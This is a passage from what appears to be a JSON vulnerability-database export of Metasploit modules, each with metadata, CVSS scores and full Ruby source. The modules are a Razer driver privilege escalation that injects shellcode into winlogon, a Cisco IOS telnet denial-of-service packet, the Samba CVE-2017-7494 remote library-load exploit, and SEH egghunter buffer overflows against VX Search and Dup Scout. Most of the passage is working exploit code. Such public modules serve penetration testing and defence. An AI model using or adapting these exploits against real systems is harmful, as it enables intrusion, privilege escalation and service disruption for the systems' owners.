this system.')\n end\n\n if session.platform != 'windows'\n fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')\n elsif session.arch != ARCH_X64\n fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')\n end\n\n pid = session.sys.process['RazerIngameEngine.exe']\n if pid\n # if this process is running, the IOCTL won't work but the process runs\n # with user privileges so we can kill it\n print_status(\"Found RazerIngameEngine.exe pid: #{pid}, killing it...\")\n session.sys.process.kill(pid)\n end\n\n pid = session.sys.process['winlogon.exe']\n print_status(\"Found winlogon pid: #{pid}\")\n\n handle = get_handle(pid)\n fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?\n vprint_status('Successfully opened a handle to the winlogon process')\n\n winlogon = session.sys.process.new(pid, handle)\n allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH\n shellcode_address = winlogon.memory.allocate(allocation_size)\n winlogon.memory.protect(shellcode_address)\n print_good(\"Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}\")\n winlogon.memory.write(shellcode_address, payload.encoded)\n hook_stub_address = shellcode_address + payload.encoded.length\n\n result = session.railgun.kernel32.LoadLibraryA('user32')\n fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0\n user32_handle = result['return']\n\n # resolve and backup the functions that we'll install trampolines in\n user32_trampolines = {} # address => original chunk\n user32_functions = ['LockWindowStation']\n user32_functions.each do |function|\n address = get_address(user32_handle, function)\n winlogon.memory.protect(address)\n user32_trampolines[function] = {\n address: address,\n original: winlogon.memory.read(address, 24)\n }\n end\n\n # generate and install the hook asm\n hook_stub = get_hook(shellcode_address, user32_trampolines)\n 
fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?\n # if this happens, there was a programming error\n fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH\n\n winlogon.memory.write(hook_stub_address, hook_stub)\n vprint_status(\"Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}\")\n\n # install the asm trampolines to jump to the hook\n user32_trampolines.each do |function, trampoline_info|\n address = trampoline_info[:address]\n trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{\n mov rax, 0x#{address.to_s(16)}\n push rax\n mov rax, 0x#{hook_stub_address.to_s(16)}\n jmp rax\n }).encode_string\n winlogon.memory.write(address, trampoline)\n vprint_status(\"Installed user32!#{function} trampoline at 0x#{address.to_s(16)}\")\n end\n\n session.railgun.user32.LockWorkStation()\n session.railgun.kernel32.CloseHandle(handle)\n end\n\n def get_address(dll_handle, function_name)\n result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name)\n fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0\n result['return']\n end\n\n # this is where the actual vulnerability is leveraged\n def get_handle(pid)\n handle = open_device(\"\\\\\\\\.\\\\47CD78C9-64C3-47C2-B80F-677B887CF095\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\n return nil unless handle\n vprint_status('Successfully opened a handle to the driver')\n\n buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 
'QQ' : 'LL')\n\n session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[\n ['DWORD', 'FileHandle', 'in' ],\n ['DWORD', 'Event', 'in' ],\n ['LPVOID', 'ApcRoutine', 'in' ],\n ['LPVOID', 'ApcContext', 'in' ],\n ['PDWORD', 'IoStatusBlock', 'out'],\n ['DWORD', 'IoControlCode', 'in' ],\n ['PBLOB', 'InputBuffer', 'in' ],\n ['DWORD', 'InputBufferLength', 'in' ],\n ['PBLOB', 'OutputBuffer', 'out'],\n ['DWORD', 'OutputBufferLength', 'in' ],\n ])\n result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length)\n return nil if result['return'] != 0\n session.railgun.kernel32.CloseHandle(handle)\n\n result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1]\n end\n\n def get_hook(shellcode_address, restore)\n dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return']\n return nil if dll_handle == 0\n create_thread_address = get_address(dll_handle, 'CreateThread')\n\n stub = %{\n call main\n ; restore the functions where the trampolines were installed\n push rbx\n }\n\n restore.each do |function, trampoline_info|\n original = trampoline_info[:original].unpack('Q*')\n stub << \"mov rax, 0x#{trampoline_info[:address].to_s(16)}\"\n original.each do |chunk|\n stub << %{\n mov rbx, 0x#{chunk.to_s(16)}\n mov qword ptr ds:[rax], rbx\n add rax, 8\n }\n end\n end\n\n stub << %{\n pop rbx\n ret\n\n main:\n ; backup registers we're going to mangle\n push r9\n push r8\n push rdx\n push rcx\n\n ; setup the arguments for the call to CreateThread\n xor rax, rax\n push rax ; lpThreadId\n push rax ; dwCreationFlags\n xor r9, r9 ; lpParameter\n mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress\n xor rdx, rdx ; dwStackSize\n xor rcx, rcx ; lpThreadAttributes\n mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread\n\n call rax\n add rsp, 16\n\n ; restore arguments that were mangled\n pop rcx\n pop rdx\n pop r8\n pop r9\n ret\n }\n 
Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/razer_zwopenprocess.rb"}, {"lastseen": "2019-11-01T19:13:48", "bulletinFamily": "exploit", "description": "This module triggers a Denial of Service condition in the Cisco IOS telnet service affecting multiple Cisco switches. Tested against Cisco Catalyst 2960 and 3750.\n", "modified": "2017-07-24T13:26:21", "published": "2017-06-25T20:06:44", "id": "MSF:AUXILIARY/DOS/CISCO/IOS_TELNET_ROCEM", "href": "", "type": "metasploit", "title": "Cisco IOS Telnet Denial of Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Cisco IOS Telnet Denial of Service',\n 'Description' => %q{\n This module triggers a Denial of Service condition in the Cisco IOS\n telnet service affecting multiple Cisco switches. 
Tested against Cisco\n Catalyst 2960 and 3750.\n },\n 'Author' => [ 'Artem Kondratenko' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['BID', '96960'],\n ['CVE', '2017-3881'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp'],\n ['URL', 'https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution']\n ],\n 'DisclosureDate' => 'Mar 17 2017'))\n\n register_options([ Opt::RPORT(23) ])\n end\n\n def run\n begin\n connect\n print_status \"Connected to telnet service\"\n packet = sock.read(200)\n if packet.nil?\n print_error \"Failed to get initial packet from telnet service.\"\n else\n print_status \"Got initial packet from telnet service: \" + packet.inspect\n end\n print_status \"Sending Telnet DoS packet\"\n sock.put(\"\\xff\\xfa\\x24\\x00\\x03CISCO_KITS\\x012:\" + Rex::Text.rand_text_alpha(1000) + \":1:\\xff\\xf0\")\n disconnect\n rescue ::Rex::ConnectionRefused\n print_status \"Unable to connect to #{rhost}:#{rport}.\"\n rescue ::Errno::ECONNRESET\n print_good \"DoS packet successful. #{rhost} not responding.\"\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/cisco/ios_telnet_rocem.rb"}, {"lastseen": "2019-10-30T15:08:16", "bulletinFamily": "exploit", "description": "This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. 
In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.\n", "modified": "2019-01-10T19:19:14", "published": "2017-05-25T00:42:04", "id": "MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME", "href": "", "type": "metasploit", "title": "Samba is_known_pipename() Arbitrary Module Load", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Samba is_known_pipename() Arbitrary Module Load',\n 'Description' => %q{\n This module triggers an arbitrary shared library load vulnerability\n in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module\n requires valid credentials, a writeable folder in an accessible share,\n and knowledge of the server-side path of the writeable folder. 
In\n some cases, anonymous access combined with common filesystem locations\n can be used to automatically exploit this vulnerability.\n },\n 'Author' =>\n [\n 'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery & Python Exploit\n 'hdm', # Metasploit Module\n 'bcoles', # Check logic\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2017-7494' ],\n [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],\n ],\n 'Payload' =>\n {\n 'Space' => 9000,\n 'DisableNops' => true\n },\n 'Platform' => 'linux',\n 'Targets' =>\n [\n\n [ 'Automatic (Interact)',\n { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ], 'Interact' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find'\n }\n }\n }\n ],\n [ 'Automatic (Command)',\n { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] }\n ],\n [ 'Linux x86', { 'Arch' => ARCH_X86 } ],\n [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ],\n [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ],\n [ 'Linux ARM64', { 'Arch' => ARCH_AARCH64 } ],\n [ 'Linux MIPS', { 'Arch' => ARCH_MIPS } ],\n [ 'Linux MIPSLE', { 'Arch' => ARCH_MIPSLE } ],\n [ 'Linux MIPS64', { 'Arch' => ARCH_MIPS64 } ],\n [ 'Linux MIPS64LE', { 'Arch' => ARCH_MIPS64LE } ],\n [ 'Linux PPC', { 'Arch' => ARCH_PPC } ],\n [ 'Linux PPC64', { 'Arch' => ARCH_PPC64 } ],\n [ 'Linux PPC64 (LE)', { 'Arch' => ARCH_PPC64LE } ],\n [ 'Linux SPARC', { 'Arch' => ARCH_SPARC } ],\n [ 'Linux SPARC64', { 'Arch' => ARCH_SPARC64 } ],\n [ 'Linux s390x', { 'Arch' => ARCH_ZARCH } ],\n ],\n 'DefaultOptions' =>\n {\n 'DCERPC::fake_bind_multi' => false,\n 'SHELL' => '/bin/sh',\n },\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 24 2017',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),\n OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),\n ])\n end\n\n def post_auth?\n true\n end\n\n # Setup 
our mapping of Metasploit architectures to gcc architectures\n def setup\n super\n @@payload_arch_mappings = {\n ARCH_X86 => [ 'x86' ],\n ARCH_X64 => [ 'x86_64' ],\n ARCH_MIPS => [ 'mips' ],\n ARCH_MIPSLE => [ 'mipsel' ],\n ARCH_MIPSBE => [ 'mips' ],\n ARCH_MIPS64 => [ 'mips64' ],\n ARCH_MIPS64LE => [ 'mips64el' ],\n ARCH_PPC => [ 'powerpc' ],\n ARCH_PPC64 => [ 'powerpc64' ],\n ARCH_PPC64LE => [ 'powerpc64le' ],\n ARCH_SPARC => [ 'sparc' ],\n ARCH_SPARC64 => [ 'sparc64' ],\n ARCH_ARMLE => [ 'armel', 'armhf' ],\n ARCH_AARCH64 => [ 'aarch64' ],\n ARCH_ZARCH => [ 's390x' ],\n }\n\n # Architectures we don't offically support but can shell anyways with interact\n @@payload_arch_bonus = %W{\n mips64el sparc64 s390x\n }\n\n # General platforms (OS + C library)\n @@payload_platforms = %W{\n linux-glibc\n }\n end\n\n # List all top-level directories within a given share\n def enumerate_directories(share)\n begin\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n stuff = self.simple.client.find_first(\"\\\\*\")\n directories = [\"\"]\n stuff.each_pair do |entry,entry_attr|\n next if %W{. ..}.include?(entry)\n next unless entry_attr['type'] == 'D'\n directories << entry\n end\n\n return directories\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"Enum #{share}: #{e}\")\n return nil\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n end\n end\n\n # Determine whether a directory in a share is writeable\n def verify_writeable_directory(share, directory=\"\")\n begin\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n\n random_filename = Rex::Text.rand_text_alpha(5)+\".txt\"\n filename = directory.length == 0 ? 
\"\\\\#{random_filename}\" : \"\\\\#{directory}\\\\#{random_filename}\"\n\n wfd = simple.open(filename, 'rwct')\n wfd << Rex::Text.rand_text_alpha(8)\n wfd.close\n\n simple.delete(filename)\n return true\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"Write #{share}#(unknown): #{e}\")\n return false\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n end\n end\n\n # Call NetShareGetInfo to retrieve the server-side path\n def find_share_path\n share_info = smb_netsharegetinfo(@share)\n share_info[:path].gsub(\"\\\\\", \"/\").sub(/^.*:/, '')\n end\n\n # Crawl top-level directories and test for writeable\n def find_writeable_path(share)\n subdirs = enumerate_directories(share)\n return unless subdirs\n\n if datastore['SMB_FOLDER'].to_s.length > 0\n subdirs.unshift(datastore['SMB_FOLDER'])\n end\n\n subdirs.each do |subdir|\n next unless verify_writeable_directory(share, subdir)\n return subdir\n end\n\n nil\n end\n\n # Locate a writeable directory across identified shares\n def find_writeable_share_path\n @path = nil\n share_info = smb_netshareenumall\n if datastore['SMB_SHARE_NAME'].to_s.length > 0\n share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']\n end\n\n share_info.each do |share|\n next if share.first.upcase == 'IPC$'\n found = find_writeable_path(share.first)\n next unless found\n @share = share.first\n @path = found\n break\n end\n end\n\n # Locate a writeable share\n def find_writeable\n find_writeable_share_path\n unless @share && @path\n print_error(\"No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER\")\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n print_status(\"Using location \\\\\\\\#{rhost}\\\\#{@share}\\\\#{@path} for the path\")\n end\n\n # Store the wrapped payload into the writeable share\n def upload_payload(wrapped_payload)\n begin\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n\n random_filename = Rex::Text.rand_text_alpha(8)+\".so\"\n 
filename = @path.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{@path}\\\\#{random_filename}\"\n\n wfd = simple.open(filename, 'rwct')\n wfd << wrapped_payload\n wfd.close\n\n @payload_name = random_filename\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n print_error(\"Write #{@share}#(unknown): #{e}\")\n return false\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n end\n\n print_status(\"Uploaded payload to \\\\\\\\#{rhost}\\\\#{@share}#(unknown)\")\n return true\n end\n\n # Try both pipe open formats in order to load the uploaded shared library\n def trigger_payload\n\n target = [@share_path, @path, @payload_name].join(\"/\").gsub(/\\/+/, '/')\n [\n \"\\\\\\\\PIPE\\\\\" + target,\n target\n ].each do |tpath|\n\n print_status(\"Loading the payload from server-side path #{target} using #{tpath}...\")\n\n smb_connect\n\n # Try to execute the shared library from the share\n begin\n simple.client.create_pipe(tpath)\n probe_module_path(tpath)\n\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError\n # Common errors we can safely ignore\n\n rescue Rex::Proto::SMB::Exceptions::ErrorCode => e\n\n # Look for STATUS_OBJECT_PATH_INVALID indicating our interact payload loaded\n if e.error_code == 0xc0000039\n print_good(\"Probe response indicates the interactive payload was loaded...\")\n\n smb_shell = self.sock\n self.sock = nil\n remove_socket(sock)\n handler(smb_shell)\n return true\n else\n print_error(\" >> Failed to load #{e.error_name}\")\n end\n end\n\n disconnect\n\n end\n\n false\n end\n\n # Use fancy payload wrappers to make exploitation a joyously lazy exercise\n def cycle_possible_payloads\n template_base = ::File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2017-7494\")\n template_list = []\n template_type = nil\n template_arch = nil\n\n # Handle the generic command types first\n if target.arch.include?(ARCH_CMD)\n template_type = target['Interact'] ? 
'findsock' : 'system'\n\n all_architectures = @@payload_arch_mappings.values.flatten.uniq\n\n # Include our bonus architectures for the interact payload\n if target['Interact']\n @@payload_arch_bonus.each do |t_arch|\n all_architectures << t_arch\n end\n end\n\n # Prioritize the most common architectures first\n %W{ x86_64 x86 armel armhf mips mipsel }.each do |t_arch|\n template_list << all_architectures.delete(t_arch)\n end\n\n # Queue up the rest for later\n all_architectures.each do |t_arch|\n template_list << t_arch\n end\n\n # Handle the specific architecture targets next\n else\n template_type = 'shellcode'\n target.arch.each do |t_name|\n @@payload_arch_mappings[t_name].each do |t_arch|\n template_list << t_arch\n end\n end\n end\n\n # Remove any duplicates that mau have snuck in\n template_list.uniq!\n\n # Cycle through each top-level platform we know about\n @@payload_platforms.each do |t_plat|\n\n # Cycle through each template and yield\n template_list.each do |t_arch|\n\n\n wrapper_path = ::File.join(template_base, \"samba-root-#{template_type}-#{t_plat}-#{t_arch}.so.gz\")\n next unless ::File.exists?(wrapper_path)\n\n data = ''\n ::File.open(wrapper_path, \"rb\") do |fd|\n data = Rex::Text.ungzip(fd.read)\n end\n\n pidx = data.index('PAYLOAD')\n if pidx\n data[pidx, payload.encoded.length] = payload.encoded\n end\n\n vprint_status(\"Using payload wrapper 'samba-root-#{template_type}-#{t_arch}'...\")\n yield(data)\n end\n end\n end\n\n # Verify that the payload settings make sense\n def sanity_check\n if target['Interact'] && datastore['PAYLOAD'] != \"cmd/unix/interact\"\n print_error(\"Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact\")\n print_error(\" Please set PAYLOAD to cmd/unix/interact and try this again\")\n print_error(\"\")\n fail_with(Failure::NoTarget, \"Invalid payload chosen for the interactive target\")\n end\n\n if ! 
target['Interact'] && datastore['PAYLOAD'] == \"cmd/unix/interact\"\n print_error(\"Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact\")\n print_error(\" Please set a valid PAYLOAD and try this again\")\n print_error(\"\")\n fail_with(Failure::NoTarget, \"Invalid payload chosen for the non-interactive target\")\n end\n end\n\n # Shorthand for connect and login\n def smb_connect\n connect\n smb_login\n end\n\n # Start the shell train\n def exploit\n # Validate settings\n sanity_check\n\n # Setup SMB\n smb_connect\n\n # Find a writeable share\n find_writeable\n\n # Retrieve the server-side path of the share like a boss\n print_status(\"Retrieving the remote path of the share '#{@share}'\")\n @share_path = find_share_path\n print_status(\"Share '#{@share}' has server-side path '#{@share_path}\")\n\n # Disconnect\n disconnect\n\n # Create wrappers for each potential architecture\n cycle_possible_payloads do |wrapped_payload|\n\n # Connect, upload the shared library payload, disconnect\n smb_connect\n upload_payload(wrapped_payload)\n disconnect\n\n # Trigger the payload\n early = trigger_payload\n\n # Cleanup the payload\n begin\n smb_connect\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n uploaded_path = @path.length == 0 ? 
\"\\\\#{@payload_name}\" : \"\\\\#{@path}\\\\#{@payload_name}\"\n simple.delete(uploaded_path)\n disconnect\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError\n end\n\n # Bail early if our interact payload loaded\n return if early\n end\n end\n\n # A version-based vulnerability check for Samba\n def check\n res = smb_fingerprint\n\n unless res['native_lm'] =~ /Samba ([\\d\\.]+)/\n print_error(\"does not appear to be Samba: #{res['os']} / #{res['native_lm']}\")\n return CheckCode::Safe\n end\n\n samba_version = Gem::Version.new($1.gsub(/\\.$/, ''))\n\n vprint_status(\"Samba version identified as #{samba_version.to_s}\")\n\n if samba_version < Gem::Version.new('3.5.0')\n return CheckCode::Safe\n end\n\n # Patched in 4.4.14\n if samba_version < Gem::Version.new('4.5.0') &&\n samba_version >= Gem::Version.new('4.4.14')\n return CheckCode::Safe\n end\n\n # Patched in 4.5.10\n if samba_version > Gem::Version.new('4.5.0') &&\n samba_version < Gem::Version.new('4.6.0') &&\n samba_version >= Gem::Version.new('4.5.10')\n return CheckCode::Safe\n end\n\n # Patched in 4.6.4\n if samba_version >= Gem::Version.new('4.6.4')\n return CheckCode::Safe\n end\n\n smb_connect\n find_writeable_share_path\n disconnect\n\n if @share.to_s.length == 0\n print_status(\"Samba version #{samba_version.to_s} found, but no writeable share has been identified\")\n return CheckCode::Detected\n end\n\n print_good(\"Samba version #{samba_version.to_s} found with writeable share '#{@share}'\")\n return CheckCode::Appears\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/samba/is_known_pipename.rb"}, {"lastseen": "2019-11-22T20:28:04", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of VX Search Enterprise v9.5.12, caused by improper bounds 
checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1 x86.\n", "modified": "2017-07-24T13:26:21", "published": "2017-05-18T16:12:47", "id": "MSF:EXPLOIT/WINDOWS/HTTP/VXSRCHS_BOF", "href": "", "type": "metasploit", "title": "VX Search Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'VX Search Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of VX Search Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. 
This module has been tested\n successfully on Windows 7 SP1 x86.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniel Teixeira'\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x26\",\n 'Space' => 500\n },\n 'Targets' =>\n [\n [ 'VX Search Enterprise v9.5.12',\n {\n 'Offset' => 2488,\n 'Ret' => 0x10015ffe # POP # POP # RET [libspp.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 15 2017',\n 'DefaultTarget' => 0))\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n version = res.body[/VX Search Enterprise v[^<]*/]\n if version\n vprint_status(\"Version detected: #{version}\")\n if version =~ /9\\.5\\.12/\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Detected\n end\n else\n vprint_error('Unable to determine due to a HTTP connection timeout')\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = rand_text_alpha(target['Offset'])\n sploit << generate_seh_record(target.ret)\n sploit << hunter\n sploit << make_nops(10)\n sploit << egg\n sploit << rand_text_alpha(5500)\n\n print_status('Sending request...')\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/vxsrchs_bof.rb"}, {"lastseen": "2019-11-24T10:38:52", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of Dup Scout Enterprise v9.5.14, caused by improper bounds checking of the request path in HTTP GET requests sent to 
the built-in web server. This module has been tested successfully on Windows 7 SP1 x86.\n", "modified": "2017-07-24T13:26:21", "published": "2017-04-26T14:19:00", "id": "MSF:EXPLOIT/WINDOWS/HTTP/DUPSCTS_BOF", "href": "", "type": "metasploit", "title": "Dup Scout Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Dup Scout Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Dup Scout Enterprise v9.5.14, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. 
This module has been tested\n successfully on Windows 7 SP1 x86.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'vportal',\t # Vulnerability discovery and PoC\n 'Daniel Teixeira' # Metasploit module\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x26\",\n 'Space' => 500\n },\n 'Targets' =>\n [\n [ 'Dup Scout Enterprise v9.5.14',\n {\n 'Offset' => 2488,\n 'Ret' => 0x10050ff3 # POP # POP # RET [libspp.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 15 2017',\n 'DefaultTarget' => 0))\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n version = res.body[/Dup Scout Enterprise v[^<]*/]\n if version\n vprint_status(\"Version detected: #{version}\")\n if version =~ /9\\.5\\.14/\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Detected\n end\n else\n vprint_error('Unable to determine due to a HTTP connection timeout')\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = rand_text_alpha(target['Offset'])\n sploit << generate_seh_record(target.ret)\n sploit << hunter\n sploit << make_nops(10)\n sploit << egg\n sploit << rand_text_alpha(5500)\n\n print_status('Sending request...')\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/dupscts_bof.rb"}, {"lastseen": "2019-11-22T04:26:03", "bulletinFamily": "exploit", "description": "This module exploits the default credentials of SolarWind LEM. 
A menu system is encountered when the SSH service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell. This module was tested against SolarWinds LEM v6.3.1.\n", "modified": "2018-08-16T02:27:40", "published": "2017-03-23T09:49:31", "id": "MSF:EXPLOIT/LINUX/SSH/SOLARWINDS_LEM_EXEC", "href": "", "type": "metasploit", "title": "SolarWind LEM Default SSH Password Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::SSH\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"SolarWind LEM Default SSH Password Remote Code Execution\",\n 'Description' => %q{\n This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH\n service is accessed with the default username and password which is \"cmc\" and \"password\". 
